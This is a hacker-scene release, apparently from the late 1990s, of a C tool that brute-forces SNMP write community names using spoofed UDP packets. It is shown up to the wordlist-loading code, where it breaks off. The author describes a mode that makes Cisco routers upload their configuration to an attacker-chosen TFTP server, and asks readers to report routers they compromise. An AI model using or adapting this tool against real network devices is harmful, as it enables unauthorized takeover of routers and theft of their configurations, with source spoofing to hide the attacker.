The following tool tries to brute force the community name used by the remote SNMP device. This brute force program is quite fast, and is able to find the community name in a matter of minutes.
The code itself is kinda messy. So dont start sending back comments on
that. But if you have anything to say about the idea, please do. Also if
you manage to h4k0r a router, drop me a mail, since I have done
no testing in the wild, only on HP Printers and a 3com switch. (and i got
a friend to test it on a Cisco, it does work!)
Sends snmp packets to a router, in an attempt to find out the rw community
Its basicly a very fast snmp brute forcer. Since it doesnt need to wait
for a response. it can guess communitys very fast, as fast you can send
packets, (or as fast as the router can receive them)
This is thanks to snmp using udp :]
Mode 1 is for when you have read access. It sends an snmp packet that sets
system.sysLocation.0 to the community its guessing. If it succeds. the
sysLocation will be the write community, but you need read access to see
it :]
Mode 2 is for when you dont have read access. It tells the router to
upload its config file to a tftpserver (specified on the command line)
** This mode only works on Ciscos! **
-D is delay in miliseconds. dont set this too low, or the router will drop
some of the packets. Although I think, if your sending packets across the
'net, theres not much chance of this. even if delay looww. its 100 by
delault
This was compiled on a slackware 3.6 system. On some other linux systems
the ip_udp.h file is in a different place( linux/udp.h? ) so you'll have
to change it if you get errors about it
for (i = 1;i < argc; i++)
{
if (!strcmp(argv[i],"-s"))
saddr = strdup(argv[i+1]);
if (!strcmp(argv[i],"-d"))
daddr = strdup(argv[i+1]);
if (!strcmp(argv[i],"-t"))
tftpserver = strdup(argv[i+1]);
if (!strcmp(argv[i],"-w"))
wordfile = strdup(argv[i+1]);
if (!strcmp(argv[i],"-m"))
mode = atoi(argv[i+1]);
if (!strcmp(argv[i],"-D"))
delay = atoi(argv[i+1]);
}
printf("Ok, spoofing packets from %s to %s with wordlist %s (Delay: %d)\n",saddr,daddr,wordfile,delay);
if (mode > 1)
{
printf("TFTP Address:%s\n",tftpserver);
if (inet_addr(tftpserver) == -1) { erexit("Invalid TFTP address\n"); }
}
if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
{
erexit("Invalid source/destination IP address\n");
}
if (saddr == NULL) { usage(); erexit("No Source Address"); }
if (daddr == NULL) { usage(); erexit("No Dest Address"); }
if (wordfile == NULL) { usage(); erexit("No Wordfile"); }
wordcount = 0;
fd = open(wordfile,O_RDONLY);
if (stat(wordfile,&finfo)) { printf ("Stat failed!\n"); exit(-1); }
wordfilesize = (int) finfo.st_size;
printf("Size is %d\n",wordfilesize);
words = (char *) malloc(wordfilesize);
for (i=0;i<wordfilesize;i++)
{
ret = read(fd,&a,1);
if (ret == 1)
{
if (a[0] == '\n') { a[0] = 0x00; wordcount++; }
memcpy(words+i,a,1);
}
else
{
printf("Read returned %d\n",ret);
break;
}
}
